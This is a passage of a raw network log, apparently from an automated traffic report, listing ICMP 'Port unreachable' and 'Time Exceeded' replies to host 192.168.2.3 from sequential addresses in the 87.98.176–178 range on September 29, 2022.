                                                                                                                                                Sep 29, 2022 14:48:40.545015097 CEST87.98.176.10192.168.2.3c747(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.545175076 CEST87.98.176.15192.168.2.3c74c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.545828104 CEST87.98.176.16192.168.2.3c74d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.546103001 CEST87.98.176.17192.168.2.3c74e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.548079967 CEST87.98.176.25192.168.2.3c756(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.548245907 CEST87.98.176.24192.168.2.3c755(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.548269033 CEST87.98.176.27192.168.2.3c758(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.549057961 CEST87.98.176.38192.168.2.3c763(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.549160004 CEST87.98.176.35192.168.2.3c760(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.549180984 CEST87.98.176.33192.168.2.3c75e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.549680948 CEST87.98.176.90192.168.2.3c797(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.550617933 CEST87.98.176.42192.168.2.3c767(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.551758051 CEST87.98.176.55192.168.2.3c774(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.551820993 CEST87.98.176.53192.168.2.3c772(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.552201986 CEST87.98.176.58192.168.2.3c777(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.555171967 CEST87.98.176.74192.168.2.3c787(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.556392908 CEST87.98.176.85192.168.2.3c792(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.556551933 CEST87.98.176.82192.168.2.3c78f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.557106018 CEST87.98.176.83192.168.2.3c790(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.558722019 CEST87.98.176.92192.168.2.3c792(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.558854103 CEST87.98.176.99192.168.2.3c7a0(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.559550047 CEST87.98.176.102192.168.2.3c79c(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.561223984 CEST87.98.176.151192.168.2.3c7d4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.561644077 CEST87.98.176.113192.168.2.3c7ae(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.561875105 CEST87.98.176.114192.168.2.3c7af(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.562022924 CEST87.98.176.110192.168.2.3c7ab(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.562228918 CEST87.98.176.116192.168.2.3c7b1(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.563536882 CEST87.98.176.122192.168.2.3c7b7(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.564045906 CEST87.98.176.117192.168.2.3c7ab(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.564755917 CEST87.98.176.124192.168.2.3c7b9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.564780951 CEST87.98.176.130192.168.2.3c7bf(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.567595005 CEST87.98.176.142192.168.2.3c7cb(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.568321943 CEST87.98.176.150192.168.2.3c7d3(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.568347931 CEST87.98.176.147192.168.2.3c7d0(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.570224047 CEST87.98.176.156192.168.2.3c7d9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.570656061 CEST87.98.176.158192.168.2.3c7db(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.571640968 CEST87.98.176.190192.168.2.3c7fb(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.571702003 CEST87.98.176.163192.168.2.3c7e0(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.572025061 CEST87.98.176.164192.168.2.3c7e1(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.572763920 CEST87.98.176.171192.168.2.3c7e8(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.572804928 CEST87.98.176.200192.168.2.3c805(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.573359013 CEST87.98.176.169192.168.2.3c7e6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.575819969 CEST87.98.176.215192.168.2.3c814(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.576474905 CEST87.98.176.221192.168.2.3c81a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.578250885 CEST87.98.176.185192.168.2.3c7f6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.578279018 CEST87.98.176.178192.168.2.3c7ef(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.580476046 CEST87.98.176.196192.168.2.3c801(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.580729008 CEST87.98.176.184192.168.2.3c7f5(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.580998898 CEST87.98.176.203192.168.2.3c808(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.581513882 CEST87.98.176.206192.168.2.3c80b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.581537962 CEST87.98.176.193192.168.2.3c7fe(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.581840038 CEST87.98.176.195192.168.2.3c800(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.581988096 CEST87.98.176.210192.168.2.3c80f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.583798885 CEST87.98.176.219192.168.2.3c818(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.584552050 CEST87.98.176.224192.168.2.3c81d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.585308075 CEST87.98.176.220192.168.2.3c819(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.587668896 CEST87.98.176.225192.168.2.3c81e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.588046074 CEST87.98.176.227192.168.2.3c816(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.631943941 CEST87.98.176.234192.168.2.3c827(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.633147955 CEST87.98.176.236192.168.2.3c829(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.633337975 CEST87.98.176.241192.168.2.3c82e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.633409023 CEST87.98.176.239192.168.2.3c82c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.633991957 CEST87.98.176.248192.168.2.3c835(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.634057045 CEST87.98.176.242192.168.2.3c82f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.634082079 CEST87.98.176.243192.168.2.3c829(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.634251118 CEST87.98.176.246192.168.2.3c82c(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.636516094 CEST87.98.176.254192.168.2.3c83b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.647058964 CEST87.98.177.47192.168.2.3c86c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.650156021 CEST87.98.177.4192.168.2.3c841(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.650943995 CEST87.98.177.9192.168.2.3c846(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.651108980 CEST87.98.177.13192.168.2.3c84a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.651709080 CEST87.98.177.6192.168.2.3c843(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.651732922 CEST87.98.177.26192.168.2.3c857(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.651752949 CEST87.98.177.21192.168.2.3c852(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.651793003 CEST87.98.177.20192.168.2.3c851(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.651853085 CEST87.98.177.23192.168.2.3c854(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.652195930 CEST87.98.177.83192.168.2.3c890(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.653263092 CEST87.98.177.35192.168.2.3c860(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.653287888 CEST87.98.177.88192.168.2.3c895(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.654727936 CEST87.98.177.39192.168.2.3c864(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.654779911 CEST87.98.177.41192.168.2.3c866(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.655025959 CEST87.98.177.48192.168.2.3c86d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.655184984 CEST87.98.177.107192.168.2.3c89e(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.655349970 CEST87.98.177.44192.168.2.3c869(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.657146931 CEST87.98.177.61192.168.2.3c873(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.657174110 CEST87.98.177.59192.168.2.3c878(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.657550097 CEST87.98.177.63192.168.2.3c87c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.657567978 CEST87.98.177.67192.168.2.3c880(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.657624960 CEST87.98.177.71192.168.2.3c884(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.657658100 CEST87.98.177.69192.168.2.3c882(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.657763004 CEST87.98.177.62192.168.2.3c87b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.658190012 CEST87.98.177.73192.168.2.3c886(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.659348965 CEST87.98.177.79192.168.2.3c88c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.659460068 CEST87.98.177.75192.168.2.3c888(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.660164118 CEST87.98.177.81192.168.2.3c88e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.660562992 CEST87.98.177.95192.168.2.3c89c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.660618067 CEST87.98.177.89192.168.2.3c896(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.660882950 CEST87.98.177.86192.168.2.3c893(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.661158085 CEST87.98.177.135192.168.2.3c8c4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.661175966 CEST87.98.177.96192.168.2.3c89d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.661510944 CEST87.98.177.92192.168.2.3c899(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.662749052 CEST87.98.177.102192.168.2.3c8a3(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.664390087 CEST87.98.177.108192.168.2.3c8a9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.664904118 CEST87.98.177.109192.168.2.3c8aa(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.666214943 CEST87.98.177.165192.168.2.3c8e2(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.666239977 CEST87.98.177.116192.168.2.3c8b1(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.666258097 CEST87.98.177.110192.168.2.3c8ab(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.666766882 CEST87.98.177.115192.168.2.3c8b0(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.668458939 CEST87.98.177.124192.168.2.3c8b9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.668483019 CEST87.98.177.126192.168.2.3c8bb(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.668500900 CEST87.98.177.132192.168.2.3c8c1(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.668577909 CEST87.98.177.1192.168.2.3c83e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.669075966 CEST87.98.177.185192.168.2.3c8f6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.669219971 CEST87.98.177.141192.168.2.3c8ca(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.669469118 CEST87.98.177.142192.168.2.3c8cb(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.669923067 CEST87.98.177.137192.168.2.3c8c6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.670922041 CEST87.98.177.146192.168.2.3c8cf(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.671853065 CEST87.98.177.159192.168.2.3c8dc(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.672389030 CEST87.98.177.153192.168.2.3c8d6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.672538996 CEST87.98.177.157192.168.2.3c8da(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.672739983 CEST87.98.177.155192.168.2.3c8d1(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.674326897 CEST87.98.177.166192.168.2.3c8d9(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.674854994 CEST87.98.177.169192.168.2.3c8e6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.674889088 CEST87.98.177.167192.168.2.3c8e4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.674909115 CEST87.98.177.174192.168.2.3c8eb(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.678858995 CEST87.98.177.193192.168.2.3c8fe(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.692409992 CEST87.98.177.202192.168.2.3c907(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.694169998 CEST87.98.177.214192.168.2.3c913(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.698862076 CEST87.98.177.198192.168.2.3c903(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.699491024 CEST87.98.177.203192.168.2.3c908(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.699734926 CEST87.98.177.204192.168.2.3c909(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.700695992 CEST87.98.177.207192.168.2.3c90c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.700722933 CEST87.98.177.206192.168.2.3c90b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.700952053 CEST87.98.177.210192.168.2.3c90f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.701515913 CEST87.98.177.211192.168.2.3c910(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.702030897 CEST87.98.177.219192.168.2.3c918(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.702071905 CEST87.98.177.253192.168.2.3c93a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.702166080 CEST87.98.177.220192.168.2.3c919(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.702316046 CEST87.98.177.218192.168.2.3c917(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.702470064 CEST87.98.177.215192.168.2.3c914(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.703422070 CEST87.98.177.212192.168.2.3c911(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.704035044 CEST87.98.177.230192.168.2.3c923(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.708460093 CEST87.98.177.239192.168.2.3c92c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.708493948 CEST87.98.177.243192.168.2.3c930(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.708518982 CEST87.98.177.244192.168.2.3c931(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.710546970 CEST87.98.177.250192.168.2.3c937(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:41.712080002 CEST87.98.177.233192.168.2.3c91c(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.701200008 CEST192.168.2.1192.168.2.38278(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.718390942 CEST178.33.99.160192.168.2.3c145(Time to live exceeded in transit)Time Exceeded
                                                                                                                                                Sep 29, 2022 14:48:42.721574068 CEST87.98.178.12192.168.2.3c949(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.724936008 CEST87.98.178.27192.168.2.3c958(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.727796078 CEST87.98.178.0192.168.2.3c93d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.727823019 CEST87.98.177.255192.168.2.3c93c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.727845907 CEST87.98.178.9192.168.2.3c946(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.729453087 CEST87.98.178.19192.168.2.3c950(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.729834080 CEST87.98.178.22192.168.2.3c953(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.730276108 CEST87.98.178.21192.168.2.3c94b(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.730299950 CEST87.98.178.13192.168.2.3c94a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.730797052 CEST87.98.178.25192.168.2.3c956(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.731889963 CEST87.98.178.29192.168.2.3c95a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.732242107 CEST87.98.178.26192.168.2.3c957(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.743156910 CEST178.33.99.160192.168.2.3c16b(Time to live exceeded in transit)Time Exceeded
                                                                                                                                                Sep 29, 2022 14:48:42.746099949 CEST87.98.178.52192.168.2.3c971(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.746184111 CEST87.98.178.54192.168.2.3c973(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.752099037 CEST87.98.178.33192.168.2.3c95e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.752127886 CEST87.98.178.37192.168.2.3c962(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.752146959 CEST87.98.178.36192.168.2.3c961(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.752166986 CEST87.98.178.35192.168.2.3c960(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.752192974 CEST87.98.178.39192.168.2.3c964(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.752211094 CEST87.98.178.38192.168.2.3c963(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.753922939 CEST87.98.178.44192.168.2.3c969(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.756305933 CEST87.98.178.58192.168.2.3c977(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.756913900 CEST87.98.178.55192.168.2.3c974(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.757296085 CEST87.98.178.60192.168.2.3c979(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.757394075 CEST87.98.178.59192.168.2.3c978(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.758436918 CEST87.98.178.61192.168.2.3c97a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.763525963 CEST87.98.178.62192.168.2.3c97b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.765381098 CEST87.98.178.120192.168.2.3c9b5(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.766741991 CEST87.98.178.74192.168.2.3c987(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.767056942 CEST87.98.178.71192.168.2.3c984(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.767389059 CEST87.98.178.69192.168.2.3c978(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.767571926 CEST87.98.178.76192.168.2.3c982(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.768326998 CEST87.98.178.81192.168.2.3c98e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.768837929 CEST87.98.178.79192.168.2.3c98c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.769382954 CEST87.98.178.145192.168.2.3c9ce(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.769409895 CEST87.98.178.90192.168.2.3c997(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.769432068 CEST87.98.178.89192.168.2.3c996(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.770070076 CEST87.98.178.95192.168.2.3c99c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.770148039 CEST87.98.178.97192.168.2.3c99e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.770172119 CEST87.98.178.99192.168.2.3c9a0(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.770278931 CEST87.98.178.106192.168.2.3c9a7(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.773374081 CEST87.98.178.121192.168.2.3c9b6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.773972988 CEST87.98.178.122192.168.2.3c9b7(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.774430037 CEST87.98.178.125192.168.2.3c9ba(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.774615049 CEST87.98.178.130192.168.2.3c9bf(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.775892019 CEST87.98.178.131192.168.2.3c9c0(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.775923014 CEST87.98.178.146192.168.2.3c9cf(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.776071072 CEST87.98.178.152192.168.2.3c9d5(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.776592970 CEST87.98.178.148192.168.2.3c9d1(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.777971029 CEST87.98.178.159192.168.2.3c9dc(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.779901981 CEST87.98.178.167192.168.2.3c9e4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.827485085 CEST87.98.178.181192.168.2.3c9f2(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.827510118 CEST87.98.178.186192.168.2.3c9f7(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.827531099 CEST87.98.178.176192.168.2.3c9ed(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.828907967 CEST87.98.178.190192.168.2.3c9fb(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.829063892 CEST87.98.178.193192.168.2.3c9fe(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.831891060 CEST87.98.178.172192.168.2.3c9e9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.832997084 CEST87.98.178.173192.168.2.3c9ea(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.833317995 CEST87.98.178.178192.168.2.3c9ef(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.834541082 CEST87.98.178.184192.168.2.3c9f5(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.834723949 CEST87.98.178.183192.168.2.3c9f4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.835196972 CEST87.98.178.188192.168.2.3c9f9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.835592031 CEST87.98.178.189192.168.2.3c9fa(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.835618973 CEST87.98.178.241192.168.2.3ca2e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.836844921 CEST87.98.178.194192.168.2.3c9ff(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.836926937 CEST87.98.178.195192.168.2.3ca00(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.837305069 CEST87.98.178.197192.168.2.3ca02(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.837939978 CEST87.98.178.199192.168.2.3ca04(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.837965012 CEST87.98.178.207192.168.2.3ca0c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.838040113 CEST87.98.178.206192.168.2.3ca0b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.838453054 CEST87.98.178.205192.168.2.3ca0a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.838473082 CEST87.98.178.208192.168.2.3ca0d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.839982986 CEST87.98.178.213192.168.2.3ca0b(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.840699911 CEST87.98.178.214192.168.2.3ca13(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.841576099 CEST87.98.178.225192.168.2.3ca1e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.842551947 CEST87.98.178.236192.168.2.3ca29(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:42.842628002 CEST87.98.178.234192.168.2.3ca27(Port unreachable)Destination Unreachable
